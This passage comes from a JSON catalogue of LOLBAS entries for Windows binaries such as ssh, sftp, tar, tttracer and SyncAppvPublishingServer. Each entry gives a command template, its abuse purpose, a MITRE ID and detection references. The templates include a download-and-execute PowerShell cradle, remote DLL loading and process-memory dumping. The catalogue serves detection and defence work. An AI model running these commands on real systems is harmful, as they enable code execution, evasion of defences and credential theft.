installation","aliases":[]},{"id":"lolbas:setres-exe:0","toolId":"lolbas:setres-exe","toolName":"Setres.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"setres.exe -w 800 -h 600","description":"Sets the resolution and then launches 'choice' command from the working directory.","usecase":"Executes arbitrary code","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\setres.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml"},{"type":"IOC","value":"Unusual location for choice.exe file"},{"type":"IOC","value":"Process created from choice.com binary"},{"type":"IOC","value":"Existence of choice.cmd file"}],"references":["https://twitter.com/0gtweet/status/1583356502340870144","https://lolbas-project.github.io/lolbas/Binaries/Setres/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:settingsynchost-exe:0","toolId":"lolbas:settingsynchost-exe","toolName":"SettingSyncHost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"SettingSyncHost -LoadAndRunDiagScript {PATH:.exe}","description":"Execute file specified in %COMSPEC%","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\SettingSyncHost.exe","C:\\Windows\\SysWOW64\\SettingSyncHost.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml"},{"type":"IOC","value":"SettingSyncHost.exe should not be run on a normal workstation"}],"references":["https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/SettingSyncHost/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:settingsynchost-exe:1","toolId":"lolbas:settingsynchost-exe","toolName":"SettingSyncHost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"SettingSyncHost -LoadAndRunDiagScriptNoCab {PATH:.bat}","description":"Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\\Windows\\System32.","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\SettingSyncHost.exe","C:\\Windows\\SysWOW64\\SettingSyncHost.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml"},{"type":"IOC","value":"SettingSyncHost.exe should not be run on a normal workstation"}],"references":["https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/SettingSyncHost/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:sftp-exe:0","toolId":"lolbas:sftp-exe","toolName":"Sftp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"sftp -o ProxyCommand=\"{CMD}\" .","description":"Spawns ssh.exe which in turn spawns the specified command line. See also this project's entry for ssh.exe.","usecase":"Proxy execution of specified command, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\OpenSSH\\sftp.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"sftp.exe executions with ProxyCommand on the command line"},{"type":"IOC","value":"sftp.exe spawning ssh.exe with ProxyCommand on the command line"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/pull/5414/files"}],"references":["https://news.sophos.com/en-us/2025/05/09/lumma-stealer-coming-and-going/","https://lolbas-project.github.io/lolbas/Binaries/Sftp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:sftp-exe:1","toolId":"lolbas:sftp-exe","toolName":"Sftp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"sftp -D \"{CMD}\"","description":"Spawns ssh.exe which in turn spawns the specified command line. See also this project's entry for ssh.exe.","usecase":"Proxy execution of specified command, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\OpenSSH\\sftp.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"sftp.exe executions with ProxyCommand on the command line"},{"type":"IOC","value":"sftp.exe spawning ssh.exe with ProxyCommand on the command line"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/pull/5414/files"}],"references":["https://news.sophos.com/en-us/2025/05/09/lumma-stealer-coming-and-going/","https://lolbas-project.github.io/lolbas/Binaries/Sftp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:sigverif-exe:0","toolId":"lolbas:sigverif-exe","toolName":"Sigverif.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"sigverif.exe","description":"Launch sigverif.exe GUI, click 'Advanced', specify arbitrary executable path as 'log file name', then click 'View Log' to execute the binary.","usecase":"Execute arbitrary programs through a trusted Microsoft-signed binary to bypass application whitelisting.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\sigverif.exe","C:\\Windows\\SysWOW64\\sigverif.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"sigverif.exe spawning unexpected child processes"}],"references":["https://twitter.com/0gtweet/status/1457676633809330184","https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Sigverif/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ssh-exe:0","toolId":"lolbas:ssh-exe","toolName":"ssh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ssh localhost \"{CMD}\"","description":"Executes specified command on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines.","usecase":"Execute specified command, can be used for defense evasion.","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\OpenSSH\\ssh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml"},{"type":"IOC","value":"Event ID 4624 with process name C:\\Windows\\System32\\OpenSSH\\sshd.exe."},{"type":"IOC","value":"command line arguments specifying execution."}],"references":["https://gtfobins.github.io/gtfobins/ssh/","https://gist.github.com/screetsec/97d90750bfb058eb0b49c5374cdc0ac9","https://lolbas-project.github.io/lolbas/Binaries/ssh/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ssh-exe:1","toolId":"lolbas:ssh-exe","toolName":"ssh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ssh -o ProxyCommand=\"{CMD}\" .","description":"Executes specified command from ssh.exe","usecase":"Performs execution of specified file, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\OpenSSH\\ssh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml"},{"type":"IOC","value":"Event ID 4624 with process name C:\\Windows\\System32\\OpenSSH\\sshd.exe."},{"type":"IOC","value":"command line arguments specifying execution."}],"references":["https://gtfobins.github.io/gtfobins/ssh/","https://gist.github.com/screetsec/97d90750bfb058eb0b49c5374cdc0ac9","https://lolbas-project.github.io/lolbas/Binaries/ssh/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ssh-exe:2","toolId":"lolbas:ssh-exe","toolName":"ssh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ssh -o PKCS11Provider=\"\\\\\\\\127.0.0.1\\\\Temp\\\\example.dll\" win@github.com","description":"Executes a DLL from an SMB share by abusing the PKCS11Provider option. The payload executes upon DLL load (DllMain) and requires exporting C_GetFunctionList to prevent premature termination by `ssh.exe`. Note that all backslashes should be escaped (i.e. every `\\` should be turned into `\\\\`).","usecase":"Performs indirect execution of a specified DLL from a remote share, can be used for defense evasion.","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\OpenSSH\\ssh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml"},{"type":"IOC","value":"Event ID 4624 with process name C:\\Windows\\System32\\OpenSSH\\sshd.exe."},{"type":"IOC","value":"command line arguments specifying execution."}],"references":["https://gtfobins.github.io/gtfobins/ssh/","https://gist.github.com/screetsec/97d90750bfb058eb0b49c5374cdc0ac9","https://lolbas-project.github.io/lolbas/Binaries/ssh/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:stordiag-exe:0","toolId":"lolbas:stordiag-exe","toolName":"Stordiag.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"stordiag.exe","description":"Once executed, Stordiag.exe will execute schtasks.exe systeminfo.exe and fltmc.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.","usecase":"Possible defence evasion purposes.","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\stordiag.exe","c:\\windows\\syswow64\\stordiag.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml"},{"type":"IOC","value":"systeminfo.exe, fltmc.exe or schtasks.exe or powershell.exe being executed outside of their normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"references":["https://twitter.com/eral4m/status/1451112385041911809","https://lolbas-project.github.io/lolbas/Binaries/Stordiag/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:stordiag-exe:1","toolId":"lolbas:stordiag-exe","toolName":"Stordiag.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"stordiag.exe","description":"Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.","usecase":"Possible defence evasion purposes.","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\stordiag.exe","c:\\windows\\syswow64\\stordiag.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml"},{"type":"IOC","value":"systeminfo.exe, fltmc.exe or schtasks.exe or powershell.exe being executed outside of their normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"references":["https://twitter.com/eral4m/status/1451112385041911809","https://lolbas-project.github.io/lolbas/Binaries/Stordiag/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:syncappvpublishingserver-exe:0","toolId":"lolbas:syncappvpublishingserver-exe","toolName":"SyncAppvPublishingServer.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"SyncAppvPublishingServer.exe \"n;(New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX\"","description":"Example command on how inject Powershell code into the process","usecase":"Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\SyncAppvPublishingServer.exe","C:\\Windows\\SysWOW64\\SyncAppvPublishingServer.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml"},{"type":"IOC","value":"SyncAppvPublishingServer.exe should never be in use unless App-V is deployed"}],"references":["https://twitter.com/monoxgas/status/895045566090010624","https://lolbas-project.github.io/lolbas/Binaries/SyncAppvPublishingServer/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:tar-exe:0","toolId":"lolbas:tar-exe","toolName":"Tar.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"tar -cf {PATH}:ads {PATH_ABSOLUTE:folder}","description":"Compress one or more files to an alternate data stream (ADS).","usecase":"Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\tar.exe","C:\\Windows\\SysWOW64\\tar.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_compression.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_extraction.yml"},{"type":"IOC","value":"tar.exe extracting files from a remote host within the environment"},{"type":"IOC","value":"Abnormal processes spawning tar.exe"},{"type":"IOC","value":"tar.exe interacting with alternate data streams (ADS)"}],"references":["https://twitter.com/Cyber_Sorcery/status/1619819249886969856","https://lolbas-project.github.io/lolbas/Binaries/Tar/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:tar-exe:1","toolId":"lolbas:tar-exe","toolName":"Tar.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"tar -xf {PATH}:ads","description":"Decompress a compressed file from an alternate data stream (ADS).","usecase":"Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\tar.exe","C:\\Windows\\SysWOW64\\tar.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_compression.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_extraction.yml"},{"type":"IOC","value":"tar.exe extracting files from a remote host within the environment"},{"type":"IOC","value":"Abnormal processes spawning tar.exe"},{"type":"IOC","value":"tar.exe interacting with alternate data streams (ADS)"}],"references":["https://twitter.com/Cyber_Sorcery/status/1619819249886969856","https://lolbas-project.github.io/lolbas/Binaries/Tar/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:tar-exe:2","toolId":"lolbas:tar-exe","toolName":"Tar.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"tar -xf {PATH_SMB:.tar}","description":"Extracts archive.tar from the remote (internal) host to the current host.","usecase":"Copy files","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\tar.exe","C:\\Windows\\SysWOW64\\tar.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_compression.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_extraction.yml"},{"type":"IOC","value":"tar.exe extracting files from a remote host within the environment"},{"type":"IOC","value":"Abnormal processes spawning tar.exe"},{"type":"IOC","value":"tar.exe interacting with alternate data streams (ADS)"}],"references":["https://twitter.com/Cyber_Sorcery/status/1619819249886969856","https://lolbas-project.github.io/lolbas/Binaries/Tar/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ttdinject-exe:0","toolId":"lolbas:ttdinject-exe","toolName":"Ttdinject.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"TTDInject.exe /ClientParams \"7 tmp.run 0 0 0 0 0 0 0 0 0 0\" /Launch \"{PATH:.exe}\"","description":"Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.","usecase":"Spawn process using other binary","mitre":["T1127"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\ttdinject.exe","C:\\Windows\\Syswow64\\ttdinject.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/7ea6ed3db65e0bd812b051d9bb4fffd27c4c4d0a/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml"},{"type":"IOC","value":"Parent child relationship. Ttdinject.exe parent for executed command"},{"type":"IOC","value":"Multiple queries made to the IFEO registry key of an untrusted executable (Ex. \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\payload.exe\") from the ttdinject.exe process"}],"references":["https://twitter.com/Oddvarmoe/status/1196333160470138880","https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ttdinject-exe:1","toolId":"lolbas:ttdinject-exe","toolName":"Ttdinject.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams \"7 tmp.run 0 0 0 0 0 0 0 0 0 0\" /launch \"{PATH:.exe}\"","description":"Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.","usecase":"Spawn process using other binary","mitre":["T1127"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\ttdinject.exe","C:\\Windows\\Syswow64\\ttdinject.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/7ea6ed3db65e0bd812b051d9bb4fffd27c4c4d0a/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml"},{"type":"IOC","value":"Parent child relationship. Ttdinject.exe parent for executed command"},{"type":"IOC","value":"Multiple queries made to the IFEO registry key of an untrusted executable (Ex. \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\payload.exe\") from the ttdinject.exe process"}],"references":["https://twitter.com/Oddvarmoe/status/1196333160470138880","https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:tttracer-exe:0","toolId":"lolbas:tttracer-exe","toolName":"Tttracer.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"tttracer.exe {PATH_ABSOLUTE:.exe}","description":"Execute specified executable from tttracer.exe. Requires administrator privileges.","usecase":"Spawn process using other binary","mitre":["T1127"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\tttracer.exe","C:\\Windows\\SysWOW64\\tttracer.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_tttracer_mod_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Parent child relationship. Tttracer parent for executed command"}],"references":["https://twitter.com/oulusoyum/status/1191329746069655553","https://twitter.com/mattifestation/status/1196390321783025666","https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html","https://lolbas-project.github.io/lolbas/Binaries/Tttracer/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:tttracer-exe:1","toolId":"lolbas:tttracer-exe","toolName":"Tttracer.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"TTTracer.exe -dumpFull -attach {PID}","description":"Dumps process using tttracer.exe. Requires administrator privileges","usecase":"Dump process by PID","mitre":["T1003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\tttracer.exe","C:\\Windows\\SysWOW64\\tttracer.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_tttracer_mod_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Parent child relationship. Tttracer parent for executed command"}],"references":["https://twitter.com/oulusoyum/status/1191329746069655553","https://twitter.com/mattifestation/status/1196390321783025666","https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html","https://lolbas-project.github.io/lolbas/Binaries/Tttracer/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:unregmp2-exe:0","toolId":"lolbas:unregmp2-exe","toolName":"Unregmp2.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rmdir %temp%\\lolbin /s /q 2>nul & mkdir \"%temp%\\lolbin\\Windows Media Player\" & copy C:\\Windows\\System32\\calc.exe \"%temp%\\lolbin\\Windows Media Player\\wmpnscfg.exe\" >nul && cmd /V /C \"set \"ProgramW6432=%temp%\\lolbin\" && unregmp2.exe /HideWMP\"","description":"Allows an attacker to copy a target binary to a controlled directory and modify the 'ProgramW6432' environment variable to point to that controlled directory, then execute 'unregmp2.exe' with argument '/HideWMP' which will spawn a process at the hijacked path '%ProgramW6432%\\wmpnscfg.exe'.","usecase":"Proxy execution of binary","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\unregmp2.exe","C:\\Windows\\SysWOW64\\unregmp2.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml"},{"type":"IOC","value":"Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of `unregmp2.exe /HideWMP`"}],"references":["https://twitter.com/notwhickey/status/1466588365336293385","https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:vbc-exe:0","toolId":"lolbas:vbc-exe","toolName":"vbc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"vbc.exe /target:exe {PATH_ABSOLUTE:.vb}","description":"Binary file used by .NET to compile Visual Basic code to an executable.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\vbc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/vbc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:vbc-exe:1","toolId":"lolbas:vbc-exe","toolName":"vbc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"vbc -reference:Microsoft.VisualBasic.dll {PATH_ABSOLUTE:.vb}","description":"Binary file used by .NET to compile Visual Basic code to an executable.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\vbc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/vbc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:verclsid-exe:0","toolId":"lolbas:verclsid-exe","toolName":"Verclsid.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"verclsid.exe /S /C {CLSID}","description":"Used to verify a COM object before it is instantiated by Windows Explorer","usecase":"Run a COM object created in registry to evade defensive counter measures","mitre":["T1218.012"],"privilege":"user","fullPath":["C:\\Windows\\System32\\verclsid.exe","C:\\Windows\\SysWOW64\\verclsid.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/verclsid_clsid_execution.yml"}],"references":["https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5","https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://lolbas-project.github.io/lolbas/Binaries/Verclsid/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:vssadmin-exe:0","toolId":"lolbas:vssadmin-exe","toolName":"Vssadmin.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense 